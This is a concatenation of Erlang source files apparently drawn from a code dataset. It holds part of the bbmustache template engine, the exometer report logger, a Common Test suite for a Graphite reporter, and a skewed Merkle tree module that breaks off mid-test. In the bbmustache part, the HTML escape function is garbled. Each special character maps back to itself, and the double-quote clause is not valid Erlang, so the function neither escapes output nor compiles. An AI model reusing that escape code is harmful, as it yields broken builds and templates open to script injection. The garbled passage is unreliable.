repeatedly_binary(_, _) ->
false.
%% @doc During the first element of the tuple is true, to perform the function repeatedly.
-spec while({boolean(), term()}, fun((term()) -> {boolean(), term()})) -> term().
while({true, Value}, Fun) ->
while(Fun(Value), Fun);
while({false, Value}, _Fun) ->
Value.
%% @equiv binary:part(X, Start, byte_size(X) - Start + End)
-spec part(binary(), non_neg_integer(), 0 | neg_integer()) -> binary().
part(X, Start, End) when End =< 0 ->
binary:part(X, Start, byte_size(X) - Start + End).
%% @doc binary to keys
-spec keys(binary()) -> [key()].
keys(Bin0) ->
Bin1 = << <<X:8>> || <<X:8>> <= Bin0, X =/= $ >>,
case Bin1 =:= <<>> orelse Bin1 =:= <<".">> of
true -> [Bin1];
false -> [X || X <- binary:split(Bin1, <<".">>, [global]), X =/= <<>>]
end.
%% @doc binary to filename key
-spec filename_key(binary()) -> key().
filename_key(Bin) ->
remove_space_from_tail(remove_space_from_head(Bin)).
%% @doc Function for binary like the `string:join/2'.
-spec binary_join(BinaryList :: [binary()], Separator :: binary()) -> binary().
binary_join([], _) ->
<<>>;
binary_join(Bins, Sep) ->
[Hd | Tl] = [ [Sep, B] || B <- Bins ],
iolist_to_binary([tl(Hd) | Tl]).
%% @doc Remove the space from the head.
-spec remove_space_from_head(binary()) -> binary().
remove_space_from_head(<<" ", Rest/binary>>) -> remove_space_from_head(Rest);
remove_space_from_head(Bin) -> Bin.
%% @doc Remove the indent from the head.
-spec remove_indent_from_head(binary()) -> binary().
remove_indent_from_head(<<X:8, Rest/binary>>) when X =:= $\t; X =:= $ ->
remove_indent_from_head(Rest);
remove_indent_from_head(Bin) ->
Bin.
%% @doc Remove the space from the tail.
-spec remove_space_from_tail(binary()) -> binary().
remove_space_from_tail(<<>>) -> <<>>;
remove_space_from_tail(Bin) ->
PosList = binary:matches(Bin, <<" ">>),
LastPos = remove_space_from_tail_impl(lists:reverse(PosList), byte_size(Bin)),
binary:part(Bin, 0, LastPos).
%% @see remove_space_from_tail/1
-spec remove_space_from_tail_impl([{non_neg_integer(), pos_integer()}], non_neg_integer()) -> non_neg_integer().
remove_space_from_tail_impl([{X, Y} | T], Size) when Size =:= X + Y ->
remove_space_from_tail_impl(T, X);
remove_space_from_tail_impl(_, Size) ->
Size.
%% @doc string or binary to binary
-spec to_binary(binary() | [byte()]) -> binary().
to_binary(Bin) when is_binary(Bin) ->
Bin;
to_binary(Bytes) when is_list(Bytes) ->
list_to_binary(Bytes).
%% @doc HTML Escape
-spec escape(binary()) -> binary().
escape(Bin) ->
<< <<(escape_char(X))/binary>> || <<X:8>> <= Bin >>.
%% @doc escape a character if needed.
-spec escape_char(byte()) -> <<_:8, _:_*8>>.
escape_char($<) -> <<"<">>;
escape_char($>) -> <<">">>;
escape_char($&) -> <<"&">>;
escape_char($") -> <<""">>;
escape_char(C) -> <<C:8>>.
%% @doc convert to {@link data_key/0} from binary.
-spec convert_keytype(key(), template()) -> data_key().
convert_keytype(KeyBin, #?MODULE{options = Options}) ->
case proplists:get_value(key_type, Options, string) of
atom ->
try binary_to_existing_atom(KeyBin, utf8) of
Atom -> Atom
catch
_:_ -> <<" ">> % It is not always present in data/0
end;
string -> binary_to_list(KeyBin);
binary -> KeyBin
end.
%% @doc fetch the value of the specified `Keys' from {@link data/0}
%%
%% - If `Keys' is `[<<".">>]', it returns `Data'.
%% - If raise_on_context_miss enabled, it raise an exception when missing `Keys'. Otherwise, it returns `Default'.
-spec get_data_recursive([key()], data(), Default :: term(), template()) -> term().
get_data_recursive(Keys, Data, Default, Template) ->
case get_data_recursive_impl(Keys, Data, Template) of
{ok, Term} -> Term;
error ->
case ?RAISE_ON_CONTEXT_MISS_ENABLED(Template#?MODULE.options) of
true -> error(?CONTEXT_MISSING_ERROR({key, binary_join(Keys, <<".">>)}));
false -> Default
end
end.
%% @see get_data_recursive/4
-spec get_data_recursive_impl([key()], data(), template()) -> {ok, term()} | error.
get_data_recursive_impl([], Data, _) ->
{ok, Data};
get_data_recursive_impl([<<".">>], Data, _) ->
{ok, Data};
get_data_recursive_impl([Key | RestKey] = Keys, Data, #?MODULE{context_stack = Stack} = State) ->
case is_list(Data) andalso find_index_data_from_lists(Key, Data) of
{ok, ChildData} -> {ok, ChildData};
_ ->
case is_recursive_data(Data) andalso find_data(convert_keytype(Key, State), Data) of
{ok, ChildData} ->
get_data_recursive_impl(RestKey, ChildData, State#?MODULE{context_stack = []});
_ when Stack =:= [] ->
error;
_ ->
get_data_recursive_impl(Keys, hd(Stack), State#?MODULE{context_stack = tl(Stack)})
end
end.
%% @doc find the value of the specified key from {@link recursive_data/0}
-spec find_data(data_key(), recursive_data() | term()) -> {ok, Value :: term()} | error.
-ifdef(namespaced_types).
find_data(Key, Map) when is_map(Map) ->
maps:find(Key, Map);
find_data(Key, AssocList) when is_list(AssocList) ->
case data_key_to_integer(Key) of
{ok, Index} ->
try lists:nth(Index, AssocList) of
Value -> {ok, Value}
catch
_ -> {ok, <<>>}
end;
_ ->
%% If key is not integer parse as Associated List
case proplists:lookup(Key, AssocList) of
none -> error;
{_, V} -> {ok, V}
end
end;
find_data(_, _) ->
error.
-else.
find_data(Key, AssocList) ->
case data_key_to_integer(Key) of
{ok, Index} ->
try lists:nth(Index, AssocList) of
Value -> {ok, Value}
catch
_ -> {ok, <<>>}
end;
_ ->
case proplists:lookup(Key, AssocList) of
none -> error;
{_, V} -> {ok, V}
end
end;
find_data(_, _) ->
error.
-endif.
%% @doc When the value is {@link recursive_data/0}, it returns true. Otherwise it returns false.
-spec is_recursive_data(recursive_data() | term()) -> boolean().
-ifdef(namespaced_types).
is_recursive_data([Tuple | _]) when is_tuple(Tuple) -> true;
is_recursive_data(V) when is_map(V) -> true;
is_recursive_data(_) -> false.
-else.
is_recursive_data([Tuple | _]) when is_tuple(Tuple) -> true;
is_recursive_data(_) -> false.
-endif.
%% @doc When the value can convert integer, it returns the integer. Otherwise it returns error.
-spec safe_binary_to_integer(binary()) -> integer() | error.
safe_binary_to_integer(Bin) ->
try
binary_to_integer(Bin)
catch _:_ ->
error
end.
-spec find_index_data_from_lists(binary(), list()) -> {ok, term()} | error.
find_index_data_from_lists(IndexBin, List) ->
case safe_binary_to_integer(IndexBin) of
Index when is_integer(Index), Index >= 0 ->
try
{ok, lists:nth(Index + 1, List)}
catch _:_ ->
error
end;
_ ->
error
end.
-spec can_access_as_list(data_key(), recursive_data() | term()) -> boolean().
can_access_as_list(Key, Value) when is_list(Value) ->
case data_key_to_integer(Key) of
{ok, _} -> true;
_ -> false
end;
can_access_as_list(_, _) -> false.
-spec data_key_to_integer(data_key()) -> {ok, integer()} | error.
data_key_to_integer(Key) when is_binary(Key) ->
case string:to_integer(Key) of
{Index, <<>>} -> {ok, Index};
_ -> error
end;
data_key_to_integer(Key) when is_list(Key) ->
case string:to_integer(Key) of
{Index, []} -> {ok, Index};
_ -> error
end;
data_key_to_integer(Key) when is_atom(Key) ->
data_key_to_integer(atom_to_list(Key));
data_key_to_integer(_) ->
error. | src/bbmustache.erl | 0.611266 | 0.40116 | bbmustache.erl | starcoder |
%% -------------------------------------------------------------------
%%
%% Copyright (c) 2015 Basho Technologies, Inc. All Rights Reserved.
%%
%% This Source Code Form is subject to the terms of the Mozilla Public
%% License, v. 2.0. If a copy of the MPL was not distributed with this
%% file, You can obtain one at http://mozilla.org/MPL/2.0/.
%%
%% -------------------------------------------------------------------
%% @doc Exometer report collector and logger.
%%
%% This module implements a behavior for collecting reporting data and
%% handling it (logging to disk or ets, printing to tty, etc.)
%%
%% The logger has built-in support for receiving input via UDP, TCP or
%% internal Erlang messaging, as well as a plugin API for custom input
%% handling. Correspondingly, it has support for output to TTY or ets, as
%% well as a plugin API for custom output.
%%
%% An example of how the logger can be used can be found in
%% `test/exometer_test_udp_reporter.erl', which implements a UDP-based
%% reporter as well as an input plugin and an output plugin. This reporter
%% is used by `test/exometer_report_SUITE.erl'.
%%
%% Loggers can be combined, e.g. by creating one logger that receives Erlang
%% messages, and other loggers that receive from different sources, prefix
%% their reports and pass them on to the first logger.
%%
%% <h2>Input plugins</h2>
%%
%% An input plugin is initiated by `Module:logger_init_input(State)', where
%% `State' is whatever was given as a `state' option (default: `undefined').
%% The function must create a process and return `{ok, Pid}'. `Pid' is
%% responsible for setting up whatever input channel is desired, and passes
%% on incoming data to the logger via Erlang messages `{plugin, Pid, Data}'.
%%
%% <h2>Output Chaining</h2>
%%
%% Each incoming data item is passed through the list of output operators.
%% Each output operator is able to modify the data (the `tty' and `ets'
%% operators leave the data unchanged). Output plugins receive the data
%% in `Module:logger_handle_data(Data, State)', which must return
%% `{NewData, NewState}'. The state is private to the plugin, while `NewData'
%% will be passed along to the next output operator.
%%
%% <h2>Flow control</h2>
%%
%% The logger will handle flow control automatically for `udp' and `tcp'
%% inputs. If `{active,once}' or `{active, false}', the logger will trigger
%% `{active, once}' each time it has handled an incoming message.
%% If `{active, N}', it will "refill" the port each time it receives an
%% indication that it has become passive.
%%
%% Input plugins create a process in `Module:logger_init_input/1'. This process
%% can mimick the behavior of Erlang ports by sending a `{plugin_passive, Pid}'
%% message to the logger. The logger will reply with a message,
%% `{plugin_active, N}', where `N' is the value given by the `active' option.
%% @end
-module(exometer_report_logger).
-behaviour(gen_server).
-export([new/1]).
-export([start_link/1]).
-export([info/0,
info/1]).
-export([init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3]).
-record(st, {id,
input,
output}).
-include_lib("parse_trans/include/exprecs.hrl").
-export_records([tcp, udp, tty, ets, int]).
%% input records
-record(tcp, {socket, port, options = [], active = once}).
-record(udp, {socket, port, options = [], active = true}).
%% output records
-record(tty, {prefix = []}).
-record(ets, {tab}).
%% both input and output
-record(int, {process}).
-record(plugin, {module, mod_state, process, active = once}).
-type proplist() :: [{atom(), any()}].
-type logger_info() :: {id, any()}
| {input, proplist()}
| {output, proplist()}.
-type plugin_state() :: any().
-callback logger_init_input(any()) ->
{ok, pid()}.
-callback logger_init_output(any()) ->
{ok, plugin_state()}.
-callback logger_handle_data(binary(), plugin_state()) ->
{binary(), plugin_state()}.
-spec new([{id, any()} | {input, list()} | {output, list()}]) -> {ok,pid()}.
%% @doc Create a new logger instance.
%%
%% This function creates a logger process with the given input and output
%% parameters.
%%
%% * `{id, ID}' is mainly for documentation and simplifying identification
%% of instances returned by {@link info/0}.
%% * `{input, PropList}' specifies what the logger listens to. Only the first
%% `input' entry is regarded, but the option is mandatory.
%% * `{output, PropList}' specifies what the logger should to with received
%% data. Multiple `output' entries are allowed, and they will be processed
%% in the order given.
%%
%% Valid input options:
%%
%% * `{mode, udp | tcp | internal | plugin}' defines the protocol
%% * `{active, false | true | once | N}' provides flow control. Default: `true'.
%% * (mode-specific options)
%%
%% Valid output options:
%%
%% * `{mode, tty | ets | plugin | internal}' defines output types
%% * (output-specific options)
%%
%% Mode-specific options, `udp':
%%
%% * `{port, integer()}' - UDP port number
%% * `{options, list()}' - Options to pass to {@link gen_udp:open/2}
%%
%% Mode-specific options, `tcp':
%%
%% * `{port, integer()}' - TCP port number
%% * `{options, list()}' - Options to pass to {@link gen_tcp:listen/2}
%%
%% Mode-specific options, `tty':
%%
%% * `{prefix, iolist()}' - Prefix string inserted before the data, which is
%% printed as-is (note that any delimiter would need to be part of the prefix)
%%
%% Mode-specific options, `ets':
%% * `{table, ets:table()}' - Ets table identifier. If not specified, an
%% ordered-set table will be created by the logger process. The incoming
%% data will be inserted as `{os:timestamp(), Data}'.
%%
%% Mode-specific options, `internal':
%% * `{process, PidOrRegname}' specifies another logger instance, which is to
%% receive data from this logger (if used in output), or which is allowed
%% to send to this logger (if used in input). If no process is given for
%% input, any process can send data (on the form
%% `{exometer_report_logger, Pid, Data}') to this logger.
%%
%% Mode-specific options, `plugin':
%%
%% * `{module, Module}' - name of callback module
%% (behaviour: `exometer_report_logger')
%% * `{state, State}' - Passed as initial argument to
%% `Module:logger_init_input/1' or `Module:logger_init_output/1', depending
%% on whether the plugin is specified as input or output.
%% @end
new(Options) ->
supervisor:start_child(exometer_report_logger_sup, [Options]).
-spec start_link(proplist()) -> {ok, pid()}.
%% @doc Start function for logger instance.
%%
%% This function is the start function eventually called as a result from
%% {@link new/1}, but whereas `new/1' creates a supervised instance, this
%% function simply creates the process. It would normally not be used directly.
%% @end
start_link(Options) ->
ID = exometer_util:get_opt(id, Options, undefined),
Input = get_input(Options),
Output = get_output(Options),
gen_server:start_link(?MODULE, {ID, Input, Output}, []).
-spec info() -> [{pid(), [logger_info()]}].
%% @doc List active logger instances.
%%
%% This function lists the instances started via {@link new/1}, along with their
%% respective settings as nested property lists.
%% @end
info() ->
[{P, info(P)} || {_, P, _, _} <- supervisor:which_children(
exometer_report_logger_sup)].
-spec info(pid()) -> [logger_info()].
%% @doc Lists the settings of a given logger instance.
info(P) ->
gen_server:call(P, info).
%% Client-side check
get_input(Opts) ->
L = exometer_util:get_opt(input, Opts),
get_input(exometer_util:get_opt(mode, L), L).
get_input(tcp, L) ->
Port = exometer_util:get_opt(port, L),
Options = exometer_util:get_opt(options, L, []),
Active = exometer_util:get_opt(
active, L, get_opt_active(Options)),
#tcp{port = Port, options = Options, active = Active};
get_input(udp, L) ->
Port = exometer_util:get_opt(port, L),
Options = exometer_util:get_opt(options, L, []),
Active = exometer_util:get_opt(
active, L, get_opt_active(Options)),
#udp{port = Port, options = Options, active = Active};
get_input(internal, L) ->
P = exometer_util:get_opt(process, L, undefined),
#int{process = P};
get_input(plugin, L) ->
Mod = exometer_util:get_opt(module, L),
St = exometer_util:get_opt(state, L, undefined),
Active = exometer_util:get_opt(active, L, true),
#plugin{module = Mod, mod_state = St, active = Active}.
get_opt_active(Opts) ->
case lists:keyfind(active, 1, Opts) of
{_, true} -> true;
{_, N} when is_integer(N) -> N;
_ -> once
end.
%% Client-side check
get_output(Opts) ->
[get_output(exometer_util:get_opt(mode, O), O) || {output, O} <- Opts].
get_output(tty, O) ->
Prefix = exometer_util:get_opt(prefix, O, []),
#tty{prefix = Prefix};
get_output(ets, O) ->
Tab = exometer_util:get_opt(tab, O, undefined),
#ets{tab = Tab};
get_output(internal, O) ->
P = exometer_util:get_opt(process, O),
#int{process = P};
get_output(plugin, O) ->
Mod = exometer_util:get_opt(module, O),
St = exometer_util:get_opt(state, O, undefined),
#plugin{module = Mod, mod_state = St}.
%% Gen_server callbacks
%% @private
init({ID, Input, Output}) ->
NewL = init_input(Input),
NewO = init_output(Output),
{ok, #st{id = ID,
input = NewL,
output = NewO}}.
%% @private
handle_call(info, _, #st{id = ID, input = I, output = O} = S) ->
{reply, info_(ID, I, O), S};
handle_call(_Req, _From, St) ->
{reply, {error, unsupported}, St}.
%% @private
handle_cast({socket, Socket}, #st{input = L} = S) ->
case L of
#tcp{active = N} = T ->
case inet:getopts(Socket, [active]) of
{ok, [{active, false}]} ->
inet:setopts(Socket, [{active, N}]);
_ ->
ok
end,
{noreply, S#st{input = T#tcp{socket = Socket}}};
_ ->
{noreply, S}
end;
handle_cast(_Msg, St) ->
{noreply, St}.
%% @private
handle_info({tcp, Socket, Data}, #st{input = #tcp{socket = Socket,
active = Active},
output = Out} = S) ->
handle_data(Data, Out),
check_active(Socket, Active),
{noreply, S};
handle_info({udp, Socket, _Host, _Port, Data},
#st{input = #udp{socket = Socket}, output = Out} = S) ->
Out1 = handle_data(Data, Out),
{noreply, S#st{output = Out1}};
handle_info({plugin, Pid, Data}, #st{input = #plugin{process = Pid},
output = Out} = S) ->
Out1 = handle_data(Data, Out),
{noreply, S#st{output = Out1}};
handle_info({tcp_passive, Socket}, #st{input = #tcp{socket = Socket,
active = Active}} = S) ->
inet:setopts(Socket, Active),
{noreply, S};
handle_info({udp_passive, Socket}, #st{input = #udp{socket = Socket,
active = Active}} = S) ->
inet:setopts(Socket, Active),
{noreply, S};
handle_info({plugin_passive, Pid}, #st{input = #plugin{process = Pid,
active = Active}} = S) ->
Pid ! {plugin_active, Active},
{noreply, S};
handle_info({?MODULE, P, Data}, #st{input = #int{process = Pl},
output = Out} = S)
when Pl =:= P; Pl =:= undefined ->
Out1 = handle_data(Data, Out),
{noreply, S#st{output = Out1}};
handle_info(_, S) ->
{noreply, S}.
%% @private
terminate(_, _) ->
ok.
%% @private
code_change(_FromVsn, S, _Extra) ->
{ok, S}.
%% End gen_server callbacks
info_(ID, I, O) ->
[{id, ID},
{input, ensure_list(pp(I))},
{output, ensure_list(pp(O))}].
ensure_list(I) when is_tuple(I) ->
[I];
ensure_list(I) when is_list(I) ->
I.
%% Copied from git:uwiger/jobs/src/jobs_info.erl
pp(L) when is_list(L) ->
[pp(X) || X <- L];
pp(X) ->
case '#is_record-'(X) of
true ->
RecName = element(1,X),
{RecName, lists:zip(
'#info-'(RecName,fields),
pp(tl(tuple_to_list(X))))};
false ->
if is_tuple(X) ->
list_to_tuple(pp(tuple_to_list(X)));
true ->
X
end
end.
init_input(#tcp{port = Port,
options = Opts} = T) ->
_ = spawn_tcp_acceptor(Port, Opts),
T;
init_input(#udp{port = Port, options = Opts} = U) ->
{ok, Socket} = gen_udp:open(Port, Opts),
U#udp{socket = Socket};
init_input(#plugin{module = Mod, mod_state = St} = P) ->
case Mod:logger_init_input(St) of
{ok, Pid} when is_pid(Pid) ->
P#plugin{process = Pid}
end;
init_input(#int{} = I) ->
I.
spawn_tcp_acceptor(Port, Opts) ->
Parent = self(),
spawn_link(fun() ->
{ok, LSock} = gen_tcp:listen(Port, Opts),
{ok, Socket} = gen_tcp:accept(LSock),
ok = gen_tcp:controlling_process(Socket, Parent),
gen_server:cast(Parent, {socket, Socket})
end).
init_output(Out) ->
[init_output_(O) || O <- Out].
init_output_(#tty{} = TTY) -> TTY;
init_output_(#int{} = Int) -> Int;
init_output_(#ets{tab = T} = E) ->
Tab = case T of
undefined ->
ets:new(?MODULE, [ordered_set]);
_ ->
T
end,
E#ets{tab = Tab};
init_output_(#plugin{module = Mod, mod_state = St} = P) ->
{ok, St1} = Mod:logger_init_output(St),
P#plugin{mod_state = St1}.
check_active(Socket, once) ->
inet:setopts(Socket, [{active, once}]);
check_active(_Socket, _) ->
ok.
handle_data(Data, Out) ->
handle_data(Data, Out, []).
handle_data(Data, [H|T], Acc) ->
{Data1, H1} = handle_data_(Data, H),
handle_data(Data1, T, [H1|Acc]);
handle_data(_, [], Acc) ->
lists:reverse(Acc).
handle_data_(Data, #tty{prefix = Pfx} = Out) ->
io:fwrite(iolist_to_binary([Pfx, Data, $\n])),
{Data, Out};
handle_data_(Data, #ets{tab = T} = Out) ->
ets:insert(T, {os:timestamp(), Data}),
{Data, Out};
handle_data_(Data, #int{process = P} = Out) ->
try P ! {?MODULE, self(), Data} catch _:_ -> error end,
{Data, Out};
handle_data_(Data, #plugin{module = Mod, mod_state = ModSt} = Out) ->
{Data1, ModSt1} = Mod:logger_handle_data(Data, ModSt),
{Data1, Out#plugin{mod_state = ModSt1}}. | src/external/cloudi_x_exometer_core/src/exometer_report_logger.erl | 0.675872 | 0.407157 | exometer_report_logger.erl | starcoder |
%/--------------------------------------------------------------------
%| Copyright 2017 Erisata, UAB (Ltd.)
%|
%| Licensed under the Apache License, Version 2.0 (the "License");
%| you may not use this file except in compliance with the License.
%| You may obtain a copy of the License at
%|
%| http://www.apache.org/licenses/LICENSE-2.0
%|
%| Unless required by applicable law or agreed to in writing, software
%| distributed under the License is distributed on an "AS IS" BASIS,
%| WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%| See the License for the specific language governing permissions and
%| limitations under the License.
%\--------------------------------------------------------------------
%%%
%%% Common Tests for `exometer_graphite' application.
%%%
-module(exometer_graphite_SUITE).
-compile([{parse_transform, lager_transform}]).
-export([all/0, init_per_suite/1, end_per_suite/1, init_per_testcase/2, end_per_testcase/2]).
-export([
test_message_sending/1,
test_static_configuration/1
]).
-define(APP, exometer_graphite).
-define(DEFAULT_TCP_SERVER_MOCK_PORT, 8049).
-define(REPORTER, exometer_graphite_reporter).
%%% ============================================================================
%%% Callbacks for `common_test'
%%% ============================================================================
%% @doc
%% CT API.
%%
all() -> [
test_message_sending,
test_static_configuration
].
%%
%% CT API, initialization.
%%
init_per_suite(Config) ->
application:load(lager),
application:set_env(lager, handlers, [{lager_console_backend, debug}]),
{ok, Apps} = application:ensure_all_started(?APP),
[{exometer_graphite_apps, Apps} | Config].
%%
%% CT API, cleanup.
%%
end_per_suite(Config) ->
ok = lists:foreach(
fun (A) -> application:stop(A) end,
proplists:get_value(exometer_graphite_apps, Config)
),
ok.
%%
%% Log test case name at start
%%
init_per_testcase(TestCase, Config) ->
lager:debug("---------------------- ~p start", [TestCase]),
Config.
%%
%% Log test case name at end. Also, clean subscriptions and metrics.
%%
end_per_testcase(TestCase, _Config) ->
lists:foreach(fun({Metric, _, _, _}) ->
exometer_report:unsubscribe_all(?REPORTER, Metric)
end, exometer_report:list_subscriptions(?REPORTER)),
lists:foreach(fun({Name, _Type, _Status}) ->
exometer:delete(Name)
end, exometer:find_entries([])),
lager:debug("---------------------- ~p end", [TestCase]),
ok.
%%% ============================================================================
%%% Test cases.
%%% ============================================================================
%% @doc
%% Check, if static subscriptions are passed to exometer report.
%% Check, if a future subscription is working when its metric is added.
%% Check, if subscription is removed if a metric is removed.
%% Check, if automatic resubscription works.
%%
test_static_configuration(_Config) ->
exometer:new([testA, cpuUsage], gauge),
exometer:new([testB, memUsage], histogram),
exometer:new([testC, lager, warning], histogram), % Should be ignored.
exometer:new([testC, store, get_message], spiral),
ok = exometer:update_or_create([testD, lager, info], 1, histogram, []),
%
% Waiting for an automatic resubscription.
timer:sleep(2100),
ExpectedSubs = [
{[testD,lager,info],n,4000,[]},
{[testD,lager,info],min,4000,[]},
{[testD,lager,info],median,4000,[]},
{[testD,lager,info],mean,4000,[]},
{[testD,lager,info],max,4000,[]},
{[testD,lager,info],999,4000,[]},
{[testD,lager,info],99,4000,[]},
{[testD,lager,info],95,4000,[]},
{[testD,lager,info],90,4000,[]},
{[testD,lager,info],75,4000,[]},
{[testD,lager,info],50,4000,[]},
{[testC,store,get_message],one,10000,[]},
{[testC,store,get_message],count,10000,[]},
{[testB,memUsage],min,2000,[]},
{[testA,cpuUsage],value,2000,[]}],
ExpectedSubs = exometer_report:list_subscriptions(exometer_graphite_reporter),
%
% Checking a situation when a new metric fitting subscription is added.
ok = exometer:update_or_create([testE, lager, debug], 1, histogram, []),
ok = exometer:delete([testC, store, get_message]),
%
% Waiting for an automatic resubscription.
timer:sleep(2100),
%
% If same subscription is added to exometer twice, only one will be shown in
% exometer_report:list_subscriptions, though actually there would be two.
NewExpectedSubs = [
{[testE,lager,debug],min,5000,[]}, %% New
{[testE,lager,debug],mean,5000,[]}, %% New
{[testE,lager,debug],max,5000,[]}, %% New
{[testD,lager,info],n,4000,[]},
{[testD,lager,info],min,4000,[]},
{[testD,lager,info],median,4000,[]},
{[testD,lager,info],mean,4000,[]},
{[testD,lager,info],max,4000,[]},
{[testD,lager,info],999,4000,[]},
{[testD,lager,info],99,4000,[]},
{[testD,lager,info],95,4000,[]},
{[testD,lager,info],90,4000,[]},
{[testD,lager,info],75,4000,[]},
{[testD,lager,info],50,4000,[]},
% {[testC,store,get_message],one,10000,[]}, %% Deleted
% {[testC,store,get_message],count,10000,[]}, %% Deleted
{[testB,memUsage],min,2000,[]},
{[testA,cpuUsage],value,2000,[]}],
NewExpectedSubs = exometer_report:list_subscriptions(?REPORTER).
%% @doc
%% Check, if grouped pickle message sending to mock server is successful.
%%
test_message_sending(_Config) ->
Port = application:get_env(?APP, port, ?DEFAULT_TCP_SERVER_MOCK_PORT),
{ok, MockPid} = graphite_server_mock:start(Port, self()),
exometer:new([testA, cpuUsage], gauge),
exometer:new([testB, memUsage], histogram),
exometer_graphite_subscribers:force_resubscribe(),
exometer:update([testB, memUsage], 10),
Message = receive
{received, Data} ->
Data;
_Other ->
lager:debug("Unexpected message.")
after
4000 ->
lager:debug("Did NOT receive message"),
ok
end,
%
% node@host differs from system to system
% checking for <<"server1.*@*.testA.cpuUsage.value">>
{Metric1Start1, _} = binary:match(Message, <<"server1.">>),
{Metric1Start2, _} = binary:match(Message, <<".testA.cpuUsage.value">>),
{_, _} = binary:match(Message, <<"@">>, [{scope, {Metric1Start1, Metric1Start2 - Metric1Start1}}]),
%
% checking for <<"server1.*@*.testB.memUsage.min">>
{Metric2Start1, _} = binary:match(Message, <<"server1.">>),
{Metric2Start2, _} = binary:match(Message, <<".testB.memUsage.min">>),
{_, _} = binary:match(Message, <<"@">>, [{scope, {Metric2Start1, Metric2Start2 - Metric2Start1}}]),
ok = graphite_server_mock:stop(MockPid),
ok. | itest/exometer_graphite_SUITE.erl | 0.507568 | 0.403861 | exometer_graphite_SUITE.erl | starcoder |
%% @doc A module with a skewed merkle tree implementation as described
%% in https://medium.com/codechain/skewed-merkle-tree-259b984acc0c.
%% This module implements a skewed merkle tree where value can be added/stacked via add/3,
%% the time and memory it takes to create is linearly proportional to the number of values.
-module(skewed).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([
new/0, add/3, verify/3,
root_hash/1, height/1, count/1,
hash_value/1
]).
-record(skewed, {
root :: tree(),
count = 0 :: non_neg_integer()
}).
-record(leaf, {
hash :: hash(),
value :: any()
}).
-record(empty, {
hash = <<0:256>> :: hash()
}).
-record(node, {
hash :: hash(),
height = 0 :: non_neg_integer(),
left :: tree(),
right :: tree()
}).
-type hash() :: binary().
-type skewed() :: #skewed{}.
-type leaf() :: #leaf{}.
-type tree() :: #leaf{} | #empty{} | #node{}.
-export_type([skewed/0, hash/0]).
%% @doc
%% Create new empty skewed merkle tree.
%% @end
-spec new() -> skewed().
new() ->
#skewed{root=#empty{}, count=0}.
%% @doc
%% Add/stack new value (leaf) on top and recalculate root hash.
%% @end
-spec add(any(), function(), skewed()) -> skewed().
add(Value, HashFun, #skewed{root=Tree, count=Count}=Skewed) ->
Leaf = to_leaf(Value, HashFun),
Node = to_node(Tree, Leaf, tree_hash(Tree), tree_hash(Leaf), Count),
Skewed#skewed{root=Node, count=Count+1}.
%% @doc
%% Verify will check that the HashToVerify is correctly in the tree with the provided,
%% in order, lists of hashes (proof) and compare it to the RootHash.
%% @end
-spec verify(hash(), [hash()], hash()) -> boolean().
verify(HashToVerify, [], RootHash) ->
HashToVerify == RootHash;
verify(HashToVerify, [FirstHash|Hashes], RootHash) ->
FirstLeaf = #leaf{hash=FirstHash, value=undefined},
Skewed = lists:foldl(
fun(Hash, #skewed{root=Tree, count=Count}=Acc) ->
Leaf = to_leaf(Hash),
Node = to_node(Tree, Leaf, tree_hash(Tree), tree_hash(Leaf), Count),
Acc#skewed{root=Node, count=Count+1}
end,
#skewed{root=FirstLeaf, count=0},
[HashToVerify|Hashes]
),
?MODULE:root_hash(Skewed) == RootHash.
%% @doc
%% Gets the root hash of the given skewed tree. This is a fast
%% operation since the hash was calculated on construction of the tree.
%% @end
-spec root_hash(skewed()) -> hash().
root_hash(#skewed{root=Tree}) ->
tree_hash(Tree).
%% @doc
%% Get the height of the given skewed tree. This is a fast operation
%% since the height was calculated on construction of the tree.
%% @end
-spec height(skewed()) -> non_neg_integer().
height(#skewed{root=Tree}) ->
tree_height(Tree).
%% @doc
%% get the number of leaves int he skewed tree.
%% @end
-spec count(skewed()) -> non_neg_integer().
count(#skewed{count=Count}) ->
Count.
%% @doc
%% A commonly used hash value for skewed trees. This function
%% will SHA256 hash the given value when it is binary. A convenience
%% form detects non-binary forms and uses term_to_binary/1 to convert
%% other erlang terms to a binary form. It is not recommended to use
%% the non-binary form if the resulting trees or proofs are to be sent
%% over a network.
%% @end
-spec hash_value(any()) -> hash().
hash_value(Value) when is_binary(Value) ->
crypto:hash(sha256, Value);
hash_value(Value) ->
hash_value(term_to_binary(Value)).
%%====================================================================
%% Internal functions
%%====================================================================
-spec to_leaf(hash()) -> leaf().
to_leaf(Hash) ->
#leaf{hash=Hash, value=undefined}.
-spec to_leaf(term(), fun((term()) -> hash())) -> leaf().
to_leaf(Value, HashFun) ->
#leaf{value=Value, hash=HashFun(Value)}.
-spec to_node(tree(), tree(), hash(), hash(), non_neg_integer()) -> tree().
to_node(L, R, LHash, RHash, Height) ->
Hash = crypto:hash(sha256, <<LHash/binary, RHash/binary>>),
#node{left=L, right=R, height=Height+1, hash=Hash}.
-spec tree_hash(tree()) -> hash().
tree_hash(#node{hash=Hash}) ->
Hash;
tree_hash(#leaf{hash=Hash}) ->
Hash;
tree_hash(#empty{hash=Hash}) ->
Hash.
-spec tree_height(tree()) -> non_neg_integer().
tree_height(#node{height=Height}) ->
Height;
tree_height(#leaf{}) ->
1;
tree_height(#empty{}) ->
0.
%% ------------------------------------------------------------------
%% EUNIT Tests
%% ------------------------------------------------------------------
-ifdef(TEST).
verify_test() ->
HashFun = fun hash_value/1,
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, HashFun, Acc)
end,
new(),
lists:seq(1, Size)
),
RootHash = ?MODULE:root_hash(Tree),
Value = 3,
Hash2 = <<55,252,129,255,194,115,98,103,168,132,199,77,143,180,26,174,29,219,145,126,179,56,47,160,125,10,249,248,75,49,96,253>>,
ValueHashes = lists:foldr(fun(V, A) -> [HashFun(V)|A] end, [], lists:seq(Value+1, Size)),
?assert(verify(HashFun(Value), [Hash2] ++ ValueHashes, RootHash)),
?assertNot(verify(HashFun(Value), [], RootHash)),
?assert(verify(RootHash, [], RootHash)),
ok.
height_test() ->
HashFun = fun hash_value/1,
Tree0 = new(),
?assertEqual(0, height(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, HashFun, Acc)
end,
new(),
lists:seq(1, 10)
),
?assertEqual(10, height(Tree1)),
